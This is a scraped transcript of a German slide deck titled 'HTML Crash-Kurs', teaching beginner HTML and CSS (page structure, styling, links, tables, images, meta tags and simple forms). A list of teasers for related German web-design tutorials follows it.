Start. HTML Crash-Kurs. HTML Crashkurs Bernd Blümel Christian Metzger

Save this PDF as:
 WORD  PNG  TXT  JPG

Größe: px
Ab Seite anzeigen:

Download "Start. HTML Crash-Kurs. HTML Crashkurs Bernd Blümel Christian Metzger"

Transkript

1 Start HTML Crash-Kurs

2 Basics HyperText Markup Language logische Auszeichnungssprache Einfache Syntax Sehr einfach zu erlernen

3 Dateiendungen und Startseite Dateiendungen.htm.html Startseite: index default welcome start kann ggf. in der Webserver Config eingestellt werden

4 Grundgerüst einer HTML-Datei <!-- Dateiname helloworld.html --> <html> <head> <title>iksy</title> </head> <body> Hello World </body> </html>

5 Literatur

6 Einfacher Zeilenumbruch <br> und Absatz <p></p> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/tr/html4/loose.dtd"> <!-- Dateiname helloworld.html --> <html> </html> <head> </head> <body> </body> <title>iksy</title> <p>hello World</p> <p>guten <br> Tag</p>

7 Absatzausrichtung: (http://de.selfhtml.org/css/eigenschaften/ausrichtung.htm#text_align) <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/tr/html4/loose.dtd"> <html> <head><title>text-align</title> </head> <body> <p style="text-align:left; margin-left:50px; margin-right:50px"> Der Absatz, den Sie gerade lesen, wurde mit <b>text-align</b> linksbündig ausgerichtet. Ferner wurde ein Rand von 50px eingestellt, just for fun oder auch, damit Sie sehen, wie die einzelnen Stylesheet-Angaben zusammenspielen.<br> Noch eine Textzeile<br> Noch eine Textzeile</p> <!--usw.--> </body> </html>

8 Schriftarten und <span> <html> <head> <title>iksy</title> </head> <body> <p><span style="font-family:'times New Roman',Times,serif">kleiner Beispieltext in Times New Roman</span><br> <span style="font-family:'times New Roman',Times,serif; font-size:200%">großer Beispieltext in Times New Roman</span></p> <p><span style="font-family:verdana">kleiner Beispieltext in Verdana</span><br> <span style="font-family:verdana; font-size:200%">großer Beispieltext in Verdana</span></p> </body> </html>

9 Styles für Elemente <html> <head> <title>titel der Datei</title> <style type="text/css"> </style> </head> body { background-color:#ffffcc; margin-left:100px; } * { color:blue; } h1 { font-size:300%; color:#ff0000; font-style:italic; border-bottom:solid thin black; } p,li { font-size:110%;line-height:140%; font-family:helvetica,arial,sans-serif; letter-spacing:0.1em; word-spacing:0.3em; }

10 Styles für Elemente, Überschriften, Listen <body> <h1>überschrift 1. Ordnung</h1> <p>ein normaler Textabsatz</p> <ul> <li>ein Listenpunkt</li> <li>ein anderer Listenpunkt</li> </ul> </body> </html>

11 Formatklassen <html> <head> <title>titel der Datei</title> <style type="text/css"> h1 { font-family:arial,sans-serif; font-size:2em; font-weight:normal; } h1.hinterlegt { background-color:#ffff00 } *.hinterlegt { background-color:#00ffff }.extra { background-color:#ff99ff }.extra.hinterlegt { background-color:#ff0000 } </style> </head>

12 Formatklassen, Überschriften <body> </body> </html> <h1>h1 ganz normal nur etwas formatiert</h1> <h1 class="hinterlegt">h1 knallgelb hinterlegt</h1> <h2> H2 ganz normal, <span class="hinterlegt"> aber <b class="extra">auch</b> hinterlegt</span></h2> <h3 class="extra hinterlegt">h3, extra hinterlegt</h3>

13 Stylesheet-Dateien (Extension.css) <html> <head> <title>titel der Datei</title> <link rel="stylesheet" type="text/css" href="formate.css"> <style type="text/css"> /*... hier sind dateispezifische Formate erlaubt... */ </style> </head> <body> </body> </html>

14 Allgemeines Block-Element <div align="center"> <h1>alles zentriert</h1> <ul> <li>alles zentriert</li> <li>alles?</li> <li>alles!</li> </ul> </div> <div align="right"> <h1>alles rechts am Rand</h1> <ul> <li>alles rechts am Rand</li> <li>alles?</li> <li>alles!</li> </ul> </div>

15 Allgemeines Block-Element formatieren <div style="text-align:center; padding:20px; border:thin solid red; margin:25px"> <h1>alles zentriert</h1> <ul> <li>alles zentriert</li> <li>alles?</li> <li><span style="font-weight:bold; color:red">alles!</span></li> </ul> </div> <div style="text-align:right; padding:20px; border:thin solid blue; margin:25px"> <h1>alles rechts am Rand</h1> <ul> <li>alles rechts am Rand</li> <li>alles?</li> <li> <span style="font-weight:bold; color:blue"> alles! </span> </li> </ul> </div>

16 Allgemeines Block-Element formatieren

17 </head> </head> <body> Farben <style type="text/css"> body { background-color:#e0e0e0; font-weight:bold; font-family:arial}.rosabox { background-color:#ffdddd; padding:6px; margin:0px; }.rosa { background-color:#ffdddd; }.gelbbox { background-color:#ffff66; padding:6px; margin:0px; }.gelb { background-color:#ffff66; } </style> </p> </body> <p class="rosabox">hinter dem Internet ist das <span class="gelb">hinternet</span>. </p> <p>dies hat nichts zu sagen.</p> <p class="gelbbox"> Im Kinderzimmer herrscht das <span class="rosa">kindernet</span>.

18 Hintergrundbilder <div style="background-image:url(background2.gif); margin:0px; padding:10px"> <h1 align="center" style="color:#ffffcc"> Willkommen im Reich der Texturen! </h1> </div>

19 Positionierung und das id-element <style type="text/css"> #box1 { position:absolute; top:50px; left:10px; width:150px; height:150px; z-index:1; } #box2 { position:absolute; top:80px; left:40px; width:100px; height:100px; z-index:2; } #box3 { position:absolute; top:120px; left:50px; width:150px; height:150px; z-index:3; } #box4 { position:absolute; top:80px; left:20px; width:70px; height:70px; z-index:1; } #box5 { position:absolute; top:100px; left:10px; width:80px; height:80px; z-index:2; } #box6 { position:absolute; top:60px; left:50px; width:90px; height:90px; z-index:-1; } </style> </head><body> <div id="box1" style="background:red; border:solid 2px blue;">box1</div> <div id="box2" style="background:blue; border:solid 2px white;">box2</div> <div id="box3" style="background:yellow; border:solid 2px red;">box3 <div id="box4" style="background:gold; border:solid 2px green;">box4</div> <div id="box5" style="background:lime; border:solid 2px navy;">box5</div> <div id="box6" style="background:red; border:solid 2px blue;">box6</div> </div>

20 <p> </p> <p> </p> Links <a href="http://www.tagesschau.de/"> ARD Tagesschau </a> Nachrichten<br> <a href="http://www.heise.de/newsticker/"> Heise Newsticker </a> Computer-Nachrichten<br> <a href="/"> Wohin der wohl führen mag? </a> <br> <a href="./"> Und der hier? </a>

21 Links, Pseudoelemente <head> <style type="text/css"> a:link { text-decoration:none; font-weight:bold; color:#e00000; } a:visited { text-decoration:none; font-weight:bold; color:#800000; } a:hover { text-decoration:none; font-weight:bold; background-color:#ff0; } a:active { text-decoration:none; font-weight:bold; background-color:#cff; } a:focus { text-decoration:none; font-weight:bold; background-color:#080; } </style> </head> <body> <p> Vermutlich kennen Sie die <a href="../../index.htm">kapiteleinstiegsseite zu CSS</a><br> Und wohl auch die <a href="../../../index.htm">einstiegsseite zu SELFHTML</a><br> Aber kennen Sie auch die <a href="../../../intro/hypertext/geschichte.htm">geschichte von Hypertext</a>?<br> </p> </body>

22 Interne Links <h1><a name="anfang">lange Seite</a></h1> <h2><a name="kapitel1">kapitel 1</a></h2> <a href="#anfang"> Seitenanfang </a> <a href="../projektintern.htm#anker"> Anker definieren und Verweise zu Ankern </a>

23 -links <p>mail an einen Hauptempfänger und einen sichtbaren Kopienempfänger:<br> <a mit Kopie</a> </p> <p>mail an einen Hauptempfänger und einen unsichtbaren Kopienempfänger:<br> <a mit Geheimkopie</a> </p> <p>mail mit vordefiniertem Subject (Betreff):<br> <a subject=eine%20mail%20von%20deinen%20web-seiten"> Mail mit Betreff </a> </p>

24 Tabellen, Umlaute <table border="1"> <tr> <th>berlin</th> <th>hamburg</th> <th>münchen</th> </tr> <tr> <td>miljöh</td> <td>kiez</td> <td>bierdampf</td> </tr> <tr> <td>buletten</td> <td>frikadellen</td> <td>fleischpflanzerl</td> </tr> </table>

25 Tabellen 2 <table border="1"> <tr> <th colspan="2">die Menschheit besteht aus</th> </tr> <tr> <td>eseln</td> <td>affen</td> </tr> </table

26 Grafiken <img src="./icons/tc-trans.jpg" alt="logo TC Südpark" width ="164" height ="189">

27 Meta-Tags <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE> New Document </TITLE> <META NAME="Generator" CONTENT="Notepad"> <META NAME="Author" CONTENT="Christian Metzger"> <META NAME="Keywords" CONTENT="HTML, Meta Tags"> <META NAME="Description" CONTENT="Beschreibung"> </HEAD>

28 Formular: Erstes einfaches Formular <form method="post" enctype="text/plain"> <table border="1" align="center"> <tr> <td> Name </td> <td> <input type="text" name="name" size="15"> </td> </tr> <tr> <td> Vorname </td> <td> <input type="text" name="vorname" size="15">

29 Formular: Erstes einfaches Formular fortgesetzt <tr> <td> PLZ </td> <td> <input type="text" name="plz" size="15"> </td> </tr> <tr> <td> Stadt </td> <td> <input type="text" name="stadt" size="15"> </td> </tr> <tr> <td> Strasse/Hausnummer </td> <td> <input type="text" name="strasse" size="15"> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="abschicken"> </td> </tr> </table> </form> </body> </html>

30 Formular: Erstes einfaches Formular in der Browserdarstellung

31 Formular: Erstes einfaches Formular - Inhalt der Inhalt der name=mustermann vorname=max plz=12123 stadt=bochum strasse=testrasse 11 Ohne Encryption (application/x-www-form-urlencoded) name=mustermann&vorname=max&plz=12123& stadt=bochum&strasse=teststra\%dfe+11

32 Formular: Formular mit Radio-Button <tr> <td> Geschlecht </td> <td> <input type="radio" name="geschlecht" value="m" checked> männlich <br> <input type="radio" name="geschlecht" value="w"> weiblich <br> </td> </tr> <tr> <td align="center"> <input type="submit" value="abschicken"> </td> <td align="center"> <input type="reset" value="zurücksetzen"> </td> </tr>

33 Formular: Formular mit Radio-Button in der Browserdarstellung

34 Formular: Formular mit Radio-Button Inhalt der Inhalt der name=mustermann vorname=max plz=12123 stadt=bochum strasse=testrasse 11 geschlecht=m

35 Formular: Formular mit Auswahlliste <tr> <td> Ermäßigung </td> <td> <select name="status"> <option value="kind">kind</option> <option value="student">student</option> <option value="erwachsener">erwachsener</option> </select> </td> </tr>

36 Formular: Formular mit Auswahlliste in der Browserdarstellung

37 Formular: Formular mit Auswahlliste Inhalt der Inhalt der name=mustermann vorname=max plz=12123 stadt=bochum strasse=testrasse 11 geschlecht=m status=student

Formulare in html Bernd Bl umel Version: 1. April 2003

Formulare in html Bernd Bl umel Version: 1. April 2003 Formulare in html Bernd Blümel Version: 1. April 2003 Inhaltsverzeichnis 1 Formulare 2 1 Kapitel 1 Formulare Formulare sind in html die einzige Interaktionsmöglichkeit mit den Benutzern unserer Internet

Mehr

HTML und CSS. Eine kurze Einführung

HTML und CSS. Eine kurze Einführung HTML und CSS Eine kurze Einführung Begriff Markup Begriff aus Druckindustrie: Layouter fügt Anmerkungen/Markierungen (Tags) hinzu Markup-Languge (ML) = Auszeichnungssprache Beispiele a) das Wort wird fett

Mehr

Meine erste Homepage - Beispiele

Meine erste Homepage - Beispiele Meine erste - Beispiele 1. Beispiel meine Willkommen auf meiner Befehle nicht über Hier ist ein Senior, der noch fit für's Internet ist. Probieren wir

Mehr

HTML Teil 2. So kann man HTML-Seiten mit

HTML Teil 2. So kann man HTML-Seiten mit <div> und CSS gestalten. So sehen einfache Formulare aus HTML Teil 2 So kann man HTML-Seiten mit und CSS gestalten So sehen einfache Formulare aus Wie könnte ein komplexer Internetauftritt aussehen? Trennung Inhaltsbereich und Navigationsbereich 2 Beispiel:

Mehr

Fachbereich Wirtschaftswissenschaften Klausur: Übung 1 zur Vorlesung E-Business und Web-Site-Engineering Sommersemester 2007 Deckblatt Hinweise

Fachbereich Wirtschaftswissenschaften Klausur: Übung 1 zur Vorlesung E-Business und Web-Site-Engineering Sommersemester 2007 Deckblatt Hinweise Klausur Übung 1 E-Business und WSE: HTML/XHTML SS 2007 Seite 1 von 4 Fachbereich Wirtschaftswissenschaften Klausur: Übung 1 zur Vorlesung E-Business und Web-Site-Engineering Sommersemester 2007 Deckblatt

Mehr

PHP JavaScript Kapitel 9. Java-Script-Objekte und das Event-Modell

PHP JavaScript Kapitel 9. Java-Script-Objekte und das Event-Modell Java-Script-Objekte und das Event-Modell 1 Interaktions-Methoden des Window-Objekts

Mehr

Aufbau eines Klassen-Selektors: selektor.klasse { css-eigenschaft1:wert1; css-eigenschaft2:wert2;...}

Aufbau eines Klassen-Selektors: selektor.klasse { css-eigenschaft1:wert1; css-eigenschaft2:wert2;...} Cascading StyleSheets (CSS) Allgemein CSS (aufeinander aufbauende Stilvorlagen) wurden 1996 vom W3C standardisiert. dienen der Ergänzung strukturierter Dokumente wie HTML oder XML. Ermöglichen die Trennung

Mehr

Digitale Medien. Übung

Digitale Medien. Übung Digitale Medien Übung HTML Heute Hyper Text Markup Language Beschreibungssprache von WWW-Seiten: Enthält die Struktur eines Dokuments und teilweise die Darstellung. ich bin eine Überschrift

Mehr

HTML-Grundlagen (X)HTML:

HTML-Grundlagen (X)HTML: HTML-Grundlagen (X)HTML: < > beginnender HTML Tag schließender HTML Tag < /> leere HTML Elemente Attribute und Werte &.; Sonderzeichen, HTML Entities Aufbau einer Datei Ein

Mehr

Contentmanagement. Dipl. Inf. Benjamin Bock Topic Maps Lab, Universität Leipzig bock@informa6k.uni leipzig.de. Schlüsselqualifika6on 10

Contentmanagement. Dipl. Inf. Benjamin Bock Topic Maps Lab, Universität Leipzig bock@informa6k.uni leipzig.de. Schlüsselqualifika6on 10 Schlüsselqualifika6on 10 Contentmanagement Dipl. Inf. Benjamin Bock Topic Maps Lab, Universität Leipzig bock@informa6k.uni leipzig.de Wiederholung HTML, CSS 2 Grundprinzip der Inhalteerstellung Trennung

Mehr

Internetseiten selbst erstellt

Internetseiten selbst erstellt Internetseiten selbst erstellt Vorüberlegungen: Übersichtsplan aller geplanten Seiten zeichnen und bereits logische Dateinamen überlegen. Inhalt der Seite Willkommen/Was gibt es zu sehen und was will ich

Mehr

HTML & Co. Ein kurzer Einblick

HTML & Co. Ein kurzer Einblick HTML & Co Ein kurzer Einblick 1 Was ist HTML? HTTP= Datenübertragungsprotokoll HTML (Hypertext Markup Language) = Formatiersystem für Textdokumente Entwickelt in Genf (CH) am CERN Befehle zur Formatierung,

Mehr

Informatik und Programmiersprachen

Informatik und Programmiersprachen Informatik und Programmiersprachen Einschub: HTML Wintersemester 2004/2005 Prof. Dr. Thomas Wieland HTML HTML = Hypertext Markup Language HTML beschreibt Inhalt, Struktur und Darstellung eines Dokumentes.

Mehr

Hypertext Markup Language HTML. Stefan Szalowski Internet-Technologien HTML

Hypertext Markup Language HTML. Stefan Szalowski Internet-Technologien HTML Hypertext Markup Language HTML Hypertext Markup Language HTML Cascading Style Sheets CSS Zwei Sprachen, mit denen Webseiten erstellt werden HTML: Strukturieren von Inhalten durch Elemente Überschriften,

Mehr

Textverarbeitung 1. 1. Textentwurf 2. Texterfassung 3. Textumformung 4. Textgestaltung 5. Textverwendung

Textverarbeitung 1. 1. Textentwurf 2. Texterfassung 3. Textumformung 4. Textgestaltung 5. Textverwendung Informatik - Text / HTML 1 Textverarbeitung 1 1. Textentwurf 2. Texterfassung 3. Textumformung 4. Textgestaltung 5. Textverwendung Leistungsmerkmale Textverarbeitung ist Standardsoftware - nutzerorientiert,

Mehr

Inhalt. Hintergrund HTML CSS. JavaScript und das Document Object Model

Inhalt. Hintergrund HTML CSS. JavaScript und das Document Object Model Andreas Heß Inhalt Hintergrund HTML CSS JavaScript und das Document Object Model Netz-Protokolle Schichtenmodell OSI DoD Beispiele 7 Anwendung 6 Darstellung 5 Sitzung Anwendungen HTTP, HTTPS, SMTP,

Mehr

IT- und Medientechnik

IT- und Medientechnik IT- und Medientechnik Vorlesung 4: 2.11.2015 Wintersemester 2015/2016 h_da, Lehrbeauftragter Teil 1: IT- und Medientechnik Themenübersicht der Vorlesung Hard- und Software Hardware: CPU, Speicher, Bus,

Mehr

Angewandte Informatik

Angewandte Informatik Angewandte Informatik Teil 9.1 Web Seiten V1.3 12.03.2011 1 von 37 Inhaltsverzeichnis 3... Welche Browser werden verwendet? 4... Mit welchen Browser surft die Welt? 5... Wie kommt der Browser zur Seite?

Mehr

Die wichtigsten HyperTextMarkupLanguage tags 1(6)

Die wichtigsten HyperTextMarkupLanguage tags 1(6) Die wichtigsten HyperTextMarkupLanguage tags 1(6) HTML ist entgegen vielen Gerüchten keine Programmiersprache, sondern lediglich ein Hilfsmittel um Text und Bild zu formatieren, welche in einem Browser

Mehr

Aufbau einer HTML Seite:

Aufbau einer HTML Seite: 1 Aufbau einer HTML Seite: Grundstruktur: Head Bereich: "nicht sichtbar" Er enthält grundlegende Informationen wie: Title, Charset, Ansichtsgröße,

Mehr

Information und ihre Darstellung: XHTML & CSS

Information und ihre Darstellung: XHTML & CSS Information und ihre Darstellung: XHTML & CSS IFB Speyer Daniel Jonietz 2009 XHTML Extensible Hypertext Markup Language Unter besonderer Berücksichtigung von XHTML 1.1. 1 Was ist XHTML? Textbasierte Auszeichnungssprache

Mehr

Web-Programmierung (WPR)

Web-Programmierung (WPR) Web-Programmierung (WPR) TFH-Berlin Sommer Semester 2008 Manfred Gruner mailto:wpr@gruner.org Web-Programmierung (WPR) Literatur: Web-Technologien (Heiko Wöhr) Konzepte Programmiermodelle - Architekturen

Mehr

Web-Technologien. Fachbereich AI, Web-Technologien 1

Web-Technologien. Fachbereich AI, Web-Technologien 1 Web-Technologien Dipl.-Inf., Dipl.-Ing. (FH) Michael Wilhelm Hochschule Harz FB Automatisierung und Informatik mwilhelm@hs-harz.de http://www.miwilhelm.de Raum 2.202 Tel. 03943 / 659 338 Fachbereich AI,

Mehr

Allgemeines. TU Dresden, 24.05.2006 Einführung in HTML Folie 2

Allgemeines. TU Dresden, 24.05.2006 Einführung in HTML Folie 2 Fakultät Elektrotechnik und Informationstechnik Einführung in HTML Dresden, 24.05.2006 Allgemeines HTML = Hypertext Markup Language 1991 am CERN in Genf entwickelt ( Tim Berners-Lee ) Ziel: wissenschaftliche

Mehr

Erste Schritte mit XHTML

Erste Schritte mit XHTML Sascha Frank SS 2005 www.saschafrank.de 3.3.05 Eigene Homepage Rechte am $HOME ändern Eigene Homepage Rechte am $HOME ändern chmod 701 /home/login Eigene Homepage Rechte am $HOME ändern chmod 701

Mehr

jetzt lerne ich Webseiten programmieren und gestalten Einfache Beispiele mit HTML, CSS, Javascript, ASP und PHP

jetzt lerne ich Webseiten programmieren und gestalten Einfache Beispiele mit HTML, CSS, Javascript, ASP und PHP jetzt lerne ich Webseiten programmieren und gestalten Einfache Beispiele mit HTML, CSS, Javascript, ASP und PHP CHRISTIAN WENZ TOBIAS HAUSER KAPITEL 3 CSS anwenden jetzt lerne ich Style-Sheets sind heute

Mehr

Cascading Style Sheets

Cascading Style Sheets CSS Cascading Style Sheets von Carsten Euwens CSS Vortragsgliederung Grundlagen Bedeutung Wie binde ich CSS überhaupt ein Wie weise ich Styles den einzelnen Elementen zu Was kann man damit machen Text

Mehr

Webdesign-Multimedia HTML und CSS

Webdesign-Multimedia HTML und CSS Webdesign-Multimedia HTML und CSS Thomas Mohr HTML Definition ˆ HTML (Hypertext Markup Language) ist eine textbasierte Auszeichnungssprache (engl. markup language) zur Strukturierung digitaler Dokumente

Mehr

Einführung in HTML. Autor : Martin Amelsberg (MartinAmelsberg@T-Online.de) Version : 4

Einführung in HTML. Autor : Martin Amelsberg (MartinAmelsberg@T-Online.de) Version : 4 Einführung in HTML Autor : Martin Amelsberg (MartinAmelsberg@T-Online.de) Version : 4 Inhaltsverzeichnis 1. Einleitung... 3 2. Was ist HTML?... 4 3. Aufbau einer HTML-Datei...4 4. Sonderzeichen und Umlaute...

Mehr

Publizieren im Internet

Publizieren im Internet Publizieren im Internet Eine eigene Homepage erstellen Teil 2 Margarita Esponda esponda@inf.fu-berlin.de Ein Bild als Hintergrund Webseite mit einen Bild als Hintergrund

Mehr

Newsletter mit TYPO3. TYPO3 Usergroup Bodensee #3tsee 13. Dezember 2012 - Singen (D) Lars Messmer - comsolit AG

Newsletter mit TYPO3. TYPO3 Usergroup Bodensee #3tsee 13. Dezember 2012 - Singen (D) Lars Messmer - comsolit AG Newsletter mit TYPO3 TYPO3 Usergroup Bodensee #3tsee 13. Dezember 2012 - Singen (D) Lars Messmer - comsolit AG www.comsolit.com Newsletter Version: 1 Seite 1 / 20 Inhalt 1. Sinnvoller Einsatz eines Newsletters

Mehr

Crashkurs Webseitenerstellung mit HTML

Crashkurs Webseitenerstellung mit HTML Ziel Crashkurs Webseitenerstellung mit HTML Das Ziel dieser Einführung in die Webseitenerstellung ist das Kennenlernen der Seitenbeschreibungssprache HTML und die Nutzung für einfach strukturierte Seiten,

Mehr

Das XML-basierte Gegenstück zu CSS ist XSL, das die Formatierung für XHTML-Dokumente festlegt.

Das XML-basierte Gegenstück zu CSS ist XSL, das die Formatierung für XHTML-Dokumente festlegt. Auszeichnungssprachen: Einführung in HTML Auszeichnungssprachen Das Wort Auszeichnen stammt aus der traditionellen Typographie. Dabei wird das Erscheinungsbild eines Textes festgelegt. Auszeichnungssprachen

Mehr

Seminar DWMX 2004. DW Session 004

Seminar DWMX 2004. DW Session 004 Seminar DWMX 2004 DW Session 004 Eigene Site aufbauen Aufbau einer persönlichen Site: Auswahl einer bestimmten Dateiorganisation Statische HTML Site Vorlagenbasierte Site Framebasierte Site Erstellen der

Mehr

XML- und Webservice- Sicherheit

XML- und Webservice- Sicherheit Gliederung ML- und Webservice- Sicherheit 1. Das World Wide Web 1.2 Grundzüge von HTML und ML 1. HTML-Versionen 3. Die wichtigsten Tags 5. ML und SL 6. HTML Literatur: A. S. Tanenbaum, Computer Networks,

Mehr

Literatur. [7-1] Meyer, Eric: CSS kurz&gut. O'Reilly, 4. Auflage, 2011. [7-2] Laborenz, Kai: CSS-Praxis. Galileo Computing, 2003

Literatur. [7-1] Meyer, Eric: CSS kurz&gut. O'Reilly, 4. Auflage, 2011. [7-2] Laborenz, Kai: CSS-Praxis. Galileo Computing, 2003 Literatur [7-1] Meyer, Eric: CSS kurz&gut. O'Reilly, 4. Auflage, 2011 [7-2] Laborenz, Kai: CSS-Praxis. Galileo Computing, 2003 [7-3] Münz, Stefan: . Addison-Wesley, 2005 [7-4]

Mehr

HTML. Webdesign 2015/16. NaReM 3.Semester. Teil 1: HTML Grundlagen. Dozentin: Karin Maier. Einführung. Grundlagen. HTML Hyper Text Markup Language

HTML. Webdesign 2015/16. NaReM 3.Semester. Teil 1: HTML Grundlagen. Dozentin: Karin Maier. Einführung. Grundlagen. HTML Hyper Text Markup Language Webdesign 201/16 NaReM 3.Semester Karin Maier Teil 1: HTML Grundlagen 1 HTML Dozentin: Karin Maier Karin Maier Einführung 1 Grundlagen HTML Hyper Text Markup Language Jeder Webseite liegt HTML-Quelltext,

Mehr

CSS. Cascading Stylesheets

CSS. Cascading Stylesheets CSS Cascading Stylesheets Themen Was sind Cascading Stylesheets? Vorteile von CSS Nachteile von CSS CSS: Versionen Regelsyntax für Stylesheets Einem HTML-Dokument Styles hinzufügen und Numerische

Mehr

Schiller-Gymnasium Hof 20.12.2004

Schiller-Gymnasium Hof 20.12.2004 Erstellen eines HTML-Dokumentes Zum Erstellen einer Homepage benötigen wir lediglich einen Editor. Zum Ansehen der fertigen Site benötigen wir wir natürlich auch einen Browser, z.b. Firefox oder Netscape

Mehr

Zeile 3-7: Der Kopf der HTML-Datei. Hier werden unsichtbare Einstellungen für das ganze Dokument vorgenommen.

Zeile 3-7: Der Kopf der HTML-Datei. Hier werden unsichtbare Einstellungen für das ganze Dokument vorgenommen. Inhalt: Grundgerüst, Tags, Zeichensatz, Meta-Tags, Farben 1 2 3 4 titel der Datei 5 6

Mehr

Crashkurs HTML und CSS

Crashkurs HTML und CSS Crashkurs HTML und CSS HTML und CSS Hinweis: Dieser Crashkurs liefert einen Überblick und Kriterien für die sachgerechte Verwendung von HTML und CSS. Zum Lernen, Nachschlagen und Ausprobieren verweise

Mehr

CSS zur Gestaltung von HTML-Seiten nutzen

CSS zur Gestaltung von HTML-Seiten nutzen CSS zur Gestaltung von HTML-Seiten nutzen Handbuch und Literatur Handbuch des RRZNs: CSS Cascading Style Sheet; Level 2 Charles Wyke-Smith: Stylin with CSS; Addison-Wesley Tommy Olsson & Paul O'Brien:

Mehr

Das TYPOlight CSS-Framework

Das TYPOlight CSS-Framework Das TYPOlight CSS-Framework Aufgaben eines CSS-Frameworks CSS-Reset Vereinheitlichung der Darstellung in allen Browsern Zurücksetzen der proprietären Abstände und Formatierungen Cross-Browser-Formatierung

Mehr

HTML - CSS. Übungen Informatik I. http://www.fbi-lkt.fh-karlsruhe.de/lab/info01/tutorial. http://de.selfhtml.org

HTML - CSS. Übungen Informatik I. http://www.fbi-lkt.fh-karlsruhe.de/lab/info01/tutorial. http://de.selfhtml.org Übungen Informatik I HTML - CSS http://www.fbi-lkt.fh-karlsruhe.de/lab/info01/tutorial http://de.selfhtml.org Folie 1 Inhalt 1. Einführung 2. Grundgerüst 3. Links / Verweise 4. Attribute 5. Farben 6. Bilder

Mehr

HTML-Tutorial. Grundlegende HTML-Kenntnisse

HTML-Tutorial. Grundlegende HTML-Kenntnisse 2008 HTML-Tutorial Grundlegende HTML-Kenntnisse Dieses HTML-Tutorial gibt Ihnen die grundlegendsten HTML-Kenntnisse mit an die Hand, die Sie für die Erstellung Ihrer ersten Webseite benötigen. Jan Pionzewski

Mehr

11 Publizieren im Web

11 Publizieren im Web 11 Publizieren im Web Für ein modernes Unternehmen ist es heute kaum vorstellbar, nicht im Internet vertreten zu sein. Laut Statistik Austria 7 haben 97 % aller österreichischen Unternehmen ab 10 Beschäftigten

Mehr

CAS WEBDESIGN UND WEBPUBLISHING KURS 1 / TAG 2: GRUNDLAGEN DER WEBENTWICKLUNG

CAS WEBDESIGN UND WEBPUBLISHING KURS 1 / TAG 2: GRUNDLAGEN DER WEBENTWICKLUNG CAS WEBDESIGN UND WEBPUBLISHING KURS 1 / TAG 2: GRUNDLAGEN DER WEBENTWICKLUNG Von Markus Stauffiger / 4eyes GmbH STRUKTUR UND ZIELE DES HEUTIGEN TAGES Repetition CSS Grundlagen CSS Eigenschaften Wie komme

Mehr

Aufgaben der Klasse FTI33 HTML: 1. Durch welchen Befehl wird ein Hyperlink in einem Bestimmten Frame angezeigt?

Aufgaben der Klasse FTI33 HTML: 1. Durch welchen Befehl wird ein Hyperlink in einem Bestimmten Frame angezeigt? Hinweis: Verstehen Sie folgende Aufgaben als mögliche Bestandteile für die anstehende Klausur. Betrachten Sie die Lösungen nicht von vorne herein als richtig, sondern beantworten Sie nochmals die Fragen

Mehr

http://www.therealgang.de/

http://www.therealgang.de/ http://www.therealgang.de/ Titel : Author : Kategorie : Vorlesung HTML und XML (Einführung) Dr. Pascal Rheinert Sonstige-Programmierung Vorlesung HTML / XML: Grundlegende Informationen zu HTML a.) Allgemeines:

Mehr

Erstellen eines HTML-Templates mit externer CSS-Datei

Erstellen eines HTML-Templates mit externer CSS-Datei Erstellen eines HTML-Templates mit externer CSS-Datei Eigenschaften der Lösung Menü mit 2 Ebenen ohne Bilder, Menü besteht aus Text (Links) Durch CSS kann das Menü aber auch die Seite angepasst werden

Mehr

-Wählen Sie die gewünschten Kriterien für die Selektion und klicken Sie anschließend auf OK um die Datensätze zu selektieren.

-Wählen Sie die gewünschten Kriterien für die Selektion und klicken Sie anschließend auf OK um die Datensätze zu selektieren. HowTo: Personalisierte Serienemails aus Selektion (ggf. mit Anhang) Versionen: CRM 5, CRM SIX I. Vorbereitung a) Erstellen einer Selektion -Grundlage für alle Serienbriefe oder Serienemails mit SuperOffice

Mehr

HTML- und CSS-Einführung Rusalka Offer Isabella Nagy

HTML- und CSS-Einführung Rusalka Offer Isabella Nagy Grundelemente der Hypertext Markup Language (HTML) und Cascading StyleSheets (CSS) Allgemeines: HTML steht für Hypertext Markup Language aktueller Standard ist HTML 4.1 bzw. XHTML 1.0 (s.a. unter http://www.w3c.org)

Mehr

3. Zeichen und Schrift

3. Zeichen und Schrift 3. Zeichen und Schrift 3.1 Medien Zeichen, Text, Schrift 3.2 Mikro-Typografie: Zeichensätze 3.3 Makro-Typografie: Gestalten mit Schrift 3.4 Hypertext und HTML (Fortsetzung) Allgemeines Textstrukturierung

Mehr

Erstellung von dynamischen Webseiten mit Cascading StyleSheets

Erstellung von dynamischen Webseiten mit Cascading StyleSheets Planerische Informationssysteme Erstellung von dynamischen Webseiten mit Cascading StyleSheets Rolf Sonderegger FS 2014 Erstellung von Webseiten mit Cascading Style Sheets Institut für Raum- und Landschaftsentwicklung

Mehr

11 Pull-Down-Menu und Datenbank

11 Pull-Down-Menu und Datenbank 11 Pull-Down-Menu und Datenbank Die Übergabe von Variablen in PHP (von einer Datei zur nächsten) kann auf zwei Arten erfolgen: Sie wird entweder in einem Formular übertragen (alle Variablen der Formularfelder,

Mehr

Vorlesungsinhalte. Internet und Webseiten-Gestaltung. Ausblick. Entwicklungsschritte

Vorlesungsinhalte. Internet und Webseiten-Gestaltung. Ausblick. Entwicklungsschritte Vorlesungsinhalte Internet und Webseiten-Gestaltung Wirtschaftsinformatik 3 Vorlesung 2005-05-13 Dipl.-Inf. (FH) T. Mättig Stylesheets (CSS) Das CSS Box-Modell Fotos, Bilder, Grafiken Tabellen 2005-05-13

Mehr

Frontend- technologien HTML. B04 Einführung in Softwaretechnologien

Frontend- technologien HTML. B04 Einführung in Softwaretechnologien Frontend- technologien HTML B04 Einführung in Softwaretechnologien Ihre Erwartungen an die Vorlesung Verknüpfung von Wirtschaft und digitaler Technologie Grundlagen, um mit Programmierern, Informatikern

Mehr

Eine wirklich große Hilfe war die Typo3-Dokumentation der Firma Mittwald: https://www.mittwald.de/fileadmin/pdf/dokus/typo3-dokumentation.

